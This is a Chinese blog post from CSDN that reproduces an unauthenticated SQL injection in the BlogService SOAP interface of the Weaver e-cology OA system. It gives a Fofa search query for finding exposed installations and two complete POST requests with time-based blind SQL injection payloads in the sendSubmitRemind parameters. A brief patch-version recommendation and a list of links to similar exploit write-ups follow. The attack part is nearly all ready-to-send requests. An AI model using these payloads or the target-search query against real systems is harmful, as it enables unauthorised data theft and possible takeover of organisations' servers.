泛微e-cology BlogService SQL注入

已于 2024-08-27 17:19:07 修改
阅读量238 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: web安全
于 2024-08-23 23:12:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141476442
版权

0x01 漏洞描述:

由于泛微e-cology未对用户的输入进行有效的过滤,BlogService中直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。

0x02 搜索语句:

Fofa:app="泛微-OA(e-cology)"

0x03 漏洞复现:

注入点1:

POST /services/BlogService HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
   <soapenv:Header/>
   <soapenv:Body>
      <web:sendSubmitRemind>
         <!--type: string-->
         <web:in0>0</web:in0>
         <!--type: string-->
         <web:in1>1' AND (SELECT 3686 FROM (SELECT(SLEEP(5)))KzVQ) AND 'WxlZ'='WxlZ</web:in1>
         <!--type: string-->
         <web:in2>2</web:in2>
      </web:sendSubmitRemind>
   </soapenv:Body>
</soapenv:Envelope>

注入点2:

POST /services/BlogService HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
   <soapenv:Header/>
   <soapenv:Body>
      <web:sendSubmitRemind>
         <!--type: string-->
         <web:in0>0</web:in0>
         <!--type: string-->
         <web:in1>1</web:in1>
         <!--type: string-->
         <web:in2>2' AND (SELECT 3686 FROM (SELECT(SLEEP(5)))KzVQ) AND 'WxlZ'='WxlZ</web:in2>
      </web:sendSubmitRemind>
   </soapenv:Body>
</soapenv:Envelope>

0x04 修复建议:

目前官方已发布安全补丁,建议受影响用户升级至最新版本:

泛微e-cology 9 >= 10.64.1

iSee857
关注
专栏目录
泛微E-Cology WorkflowServiceXml SQL注入漏洞复现(QVD-2024-26136)
0xSec
07-12 1982
2024年7月,泛微官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞
漏洞复现】泛微OA E-Cology ProcessOverRequestByXml文件读取漏洞
晚风不及你
05-13 732
泛微OA E-Cology ProcessOverRequestByXml存在任意文件读取漏洞,允许未经授权的用户读取服务器上的敏感配置文件
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1913
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 1834
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
泛微E-Cology XXE漏洞复现(QVD-2023-16177)
0xSec
07-23 6453
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 910
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
泛微E-Mobile /client.do 命令执行漏洞复现
0xSec
04-04 2180
泛微E-Mobile存在命令执行漏洞,攻击者可以通过/client.do执行任意命令执行,从而获得服务器权限。
泛微E-Cology BlogService SQL注入漏洞复现
最新发布
0xSec
08-23 922
泛微E-Cology BlogService 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
泛微E-cology8管理员后端维护手册全套
09-30
泛微E-cology8是一款企业级的协同办公自动化(OA)系统,专为现代企业管理设计,提供全面的后端维护支持。这套“泛微E-cology8管理员后端维护手册全套”涵盖了OA系统中所有后端模块的详细操作和维护指南,旨在帮助...
泛微E-cology 二次开发Java Jar包
08-13
泛微E-cology是一款国内知名的协同办公自动化系统,主要用于企业信息化建设,提升工作效率。它的二次开发功能使得用户可以根据自身需求定制化系统,扩展其功能。本文将深入探讨“泛微E-cology 二次开发Java Jar包”...
(泛微e-cology7.0)数据库表结构设计文档
11-05
泛微e-cology7.0数据库表结构设计文档 泛微e-cology7.0数据库表结构设计文档是泛微网络有限公司开发的OA系统的数据库设计文档。该文档对泛微e-cology7.0系统中的所有表结构进行了详细的设计和描述。 一、基础表 ...
漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
做自己喜欢的事,并将其发挥到极致!
11-29 5353
0x01 漏洞概述 泛微e-office是泛微旗下的一款标准的协同移动办公平台。 泛微e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行,攻击者可利用该漏洞获取服务器控制权。 0x02 影响范围 泛微e-office V9.0 0x03 漏洞复现 访问界面如下 ...
漏洞复现】泛微ecology OA系统某接口存在数据库配置信息泄露漏洞
热门推荐
Summer's blog
05-13 1万+
泛微ecology OA系统某接口存在数据库配置信息泄露漏洞,复现的时候踩到的那些坑!经验分享与总结。
漏洞复现】泛微 e-cology 前台SQL注入漏洞
2301_79099363的博客
07-12 2169
漏洞复现】泛微 e-cology 前台SQL注入漏洞
漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞
失心少年
07-22 636
泛微E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
【1day】复现泛微e-cology9 SQL注入高危漏洞
记录并分享学习安全的知识点..
04-13 911
复现泛微e-cology9 SQL注入高危漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值